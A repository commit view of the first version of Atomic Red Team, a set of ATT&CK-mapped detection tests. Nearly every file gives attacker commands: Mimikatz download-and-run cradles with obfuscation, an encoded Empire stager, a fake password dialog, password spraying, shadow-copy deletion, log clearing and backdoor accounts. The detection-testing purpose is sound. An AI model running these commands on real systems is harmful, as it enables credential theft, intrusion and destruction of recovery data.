infosecn1nja
/
atomic-red-team
mirror of https://github.com/infosecn1nja/atomic-red-team.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Initial Commit 

Initial Checkin
mac-defense-evasion
caseysmithrc 2017-10-11 10:35:17 -07:00
commit ac8dd2cfec
61 changed files with 1550 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
LICENSE.txt Normal file
View File

@ -0,0 +1,22 @@
The MIT License
Copyright (c) 2016 Red Canary, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.

6
Linux/Credential_Access/Bash_History.md Normal file
View File

@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt

21
Linux/Linux.md Normal file
View File

@ -0,0 +1,21 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | | | | | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access | | | | | | | Remote File Copy |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |

6
Linux/Persistence/Cron_Job.md Normal file
View File

@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil

6
Mac/Credential_Access/Bash_History.md Normal file
View File

@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt

18
Mac/Execution/AppleScript.md Normal file
View File

@ -0,0 +1,18 @@
# AppleScript
MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
## One-Liners
### Execute Shell Scripts
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
https://github.com/EmpireProject/Empire
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html

26
Mac/Mac.md Normal file
View File

@ -0,0 +1,26 @@
## MITRE ATT&CK Matrix - Mac
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol |
| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding |
| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels |
| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication |
| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption |
| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy |
| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol |
| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol |
| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol |
| Trap | | Masquerading | | | | | | | Uncommonly Used Port |
| Valid Accounts | | Plist Modification | | | | | | | Web Service |
| Web Shell | | Redundant Access | | | | | | | |
| | | Scripting | | | | | | | |
| | | Space after Filename | | | | | | | |
| | | Valid Accounts | | | | | | | |

6
Mac/Persistence/Cron_Job.md Normal file
View File

@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil

13
README.md Normal file
View File

@ -0,0 +1,13 @@
# atomic-red-team
Small and highly portable detection tests mapped to the Mitre ATT&CK
Framework.
[Windows MITRE ATT&CK Matrix](Windows/Windows.md)
[Mac MITRE ATT&CK Matrix](Mac/Mac.md)
[Linux MITRE ATT&CK Matrix](Linux/Linux.md)
#### We did not create the MITRE ATT&CK Framework, we just think it is awesome and extensive.
#### ATT&CK and ATT&CK Matrix are trademarks of The MITRE Corporation

16
Windows/Collection/Clipboard_Data.md Normal file
View File

@ -0,0 +1,16 @@
# Clipboard Data
MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115)
## cmd
<command> | clip
clip < readme.txt
## PowerShell
echo Get-Process > things.txt
powershell
Get-Clipboard | iex

16
Windows/Credential_Access/Brute_Force.md Normal file
View File

@ -0,0 +1,16 @@
# Brute Force
MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
## net.exe
### Password Spray
net user /domain > DomainUsers.txt
echo "Password1" >> pass.txt
echo "1q2w3e4r" >> pass.txt
Execute:
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL

35
Windows/Credential_Access/Create Account.md Normal file
View File

@ -0,0 +1,35 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
## Net.exe
Local user add:
Net user /add Trevor SmshBgr123
Add new user to localgroup:
net localgroup administrators jack /add
Domain add:
net user username \password \domain
Add user to Active Directory:
dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
# Powershell 5.1
The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
## Add User
New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr Description 'Pwnage account'
## Create a group
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'

36
Windows/Credential_Access/Credential Dumping.md Normal file
View File

@ -0,0 +1,36 @@
# Credential Dumping
MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003)
## Powershell Mimikatz
Input:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
## Gsecdump
[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5)
Input:
gsecdump -a
## Windows Credential Editor
[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/)
Input:
wce -o output.txt
Output:
C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>

31
Windows/Defense Evasion/File_Deletion.md Normal file
View File

@ -0,0 +1,31 @@
# File Deletion
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
## cmd
del /f filename
rmdir example
## PowerShell
Remove-Item path c:\testfolder recurse
## vssadmin
vssadmin.exe Delete Shadows /All /Quiet
## wmic
wmic shadowcopy delete
## bcdedit
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
## wbadmin
wbadmin delete catalog -quiet

13
Windows/Defense Evasion/Indicator_Removal_on_Host.md Normal file
View File

@ -0,0 +1,13 @@
## Indicator Removal on Host
MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070)
## Wevtutil
Clear system logs
wevtutil cl System
Clear Security logs
wevtutil cl Security

47
Windows/Discovery/Account_Discovery.md Normal file
View File

@ -0,0 +1,47 @@
## Account Discovery
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
### Net user and group Enumeration
Domain Group Enumeration:
net groups "domain administrators" /domain
Domain User Enumeration:
net user <username> /domain
Local Group Enumeration:
net localgroup "administrators"
Local User Enumeration:
net user
## wmic.exe
### Reconnaissance
Input:
wmic useraccount get /ALL
Input:
wmic process get caption,executablepath,commandline
Input:
wmic qfe get description,installedOn /format:csv
Input:
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
Input:
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"

12
Windows/Discovery/File_and_Directory_Discovery.md Normal file
View File

@ -0,0 +1,12 @@
## File and Directory Discovery
MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
### Directory listing
Input:
dir c:\ >> %temp%\download
dir "c:\Documents and Settings" >> %temp%\download
dir "c:\Program Files\" >> %temp%\download
dir d:\ >> %temp%\download

46
Windows/Discovery/Query Registry.md Normal file
View File

@ -0,0 +1,46 @@
## Query Registry
MITRE ATT&CK Technique: [T1012](https://attack.mitre.org/wiki/Technique/T1012)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Use the following command (as Administrator) to view the drivers configured to load during startup:
reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf

19
Windows/Discovery/Remote System Discovery.md Normal file
View File

@ -0,0 +1,19 @@
# Remote System Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### net.exe
net view /domain
net view
### Ping
Ping Sweep:
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
### ARP
arp -a

16
Windows/Discovery/System Information Discovery.md Normal file
View File

@ -0,0 +1,16 @@
# Remote System Discovery
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
## SystemInfo
Input:
systeminfo
## Reg
Input:
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

19
Windows/Discovery/System Owner-User Discovery.md Normal file
View File

@ -0,0 +1,19 @@
## System Owner/User Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### cmd.exe
"cmd.exe" /C whoami
### wmic.exe
wmic useraccount get /ALL
### quser
quser /SERVER:"<computername>"
### qwinsta
qwinsta.exe" /server:<computername>

5
Windows/Execution/Bitsadmin.md Normal file
View File

@ -0,0 +1,5 @@
## bitsadmin.exe
Input:
bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1

16
Windows/Execution/InstallUtil.md Normal file
View File

@ -0,0 +1,16 @@
## InstallUtil
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
### Execution Examples:
Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
## Test Script
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)

68
Windows/Execution/PowerShell.md Normal file
View File

@ -0,0 +1,68 @@
# PowerShell
MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
### Download Mimikatz and Dump credentials
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
### Download Mimikatz and Dump credentials
Just download it:
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
Minor obfuscation:
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
All obfuscation:
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
Mimikatz - Cradlecraft PsSendKeys
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
### Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
At prompt, to test:
C:\Windows\System32\cmd.exe
### Obfuscated Powershell
Fancy obfuscation that reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
Second test:
cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
## Powershell Obfuscation
Provided by @danielbohannon
[Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md)
Setup:
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1')
Input:
Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell
Follow prompts to create variables.
Output:
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"

22
Windows/Execution/RegsvcsRegasm.md Normal file
View File

@ -0,0 +1,22 @@
## Regsvcs/Regasm
MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121)
### Execution Examples:
[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
Input:
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
## Test Script
[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs)

16
Windows/Execution/Regsvr32.md Normal file
View File

@ -0,0 +1,16 @@
## Regsvr32
MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117)
### Local Scriptlet Execution:
regsvr32.exe /s /u /i:file.sct scrobj.dll
### Remote Scriptlet Exection:
regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
## Test Script
[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct)

13
Windows/Execution/Rundll32.md Normal file
View File

@ -0,0 +1,13 @@
## Rundll32
MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085)
### Executes an export inside of a dll.
rundll32 AllTheThings.dll,EntryPoint
## Test Script
[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)

12
Windows/Execution/Trusted_Developer_Utilities.md Normal file
View File

@ -0,0 +1,12 @@
## Trusted Developer Utilities
MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127)
### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx)
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
## Test Script
[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj)

45
Windows/Execution/Windows_Management_Instrumentation.md Normal file
View File

@ -0,0 +1,45 @@
## Windows Management Instrumentation
MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047)
### Reconnaissance
Input:
wmic useraccount get /ALL
Input:
wmic process get caption,executablepath,commandline
Input:
wmic qfe get description,installedOn /format:csv
Input:
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
Input:
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
### Lateral Movement
Input:
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Input:
wmic /NODE: "192.168.0.1" process call create "evil.exe"
### Privileged Escalation
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

15
Windows/Lateral Movement/Windows Admin Shares.md Normal file
View File

@ -0,0 +1,15 @@
## Windows Admin Shares
MITRE ATT&CK Technique: [T1077](https://attack.mitre.org/wiki/Technique/T1077)
Input:
cmd.exe /c "net use \\<computer_name>\ipc$ P@ssw0rd1 /u:<domain>\Administrator"
Input:
cmd.exe /c "net use \\<computer_name>\admin$ P@ssw0rd1 /u:<domain>\Administrator"
Input:
cmd.exe /c "net use \\<computer_name>\c$ P@ssw0rd1 /u:<domain>\Administrator"

33
Windows/Lateral Movement/Windows Remote Management.md Normal file
View File

@ -0,0 +1,33 @@
## Windows Remote Management
MITRE ATT&CK Technique: [T1028](https://attack.mitre.org/wiki/Technique/T1028)
### Enable Windows Remote Management
Input:
powershell Enable-PSRemoting -Force
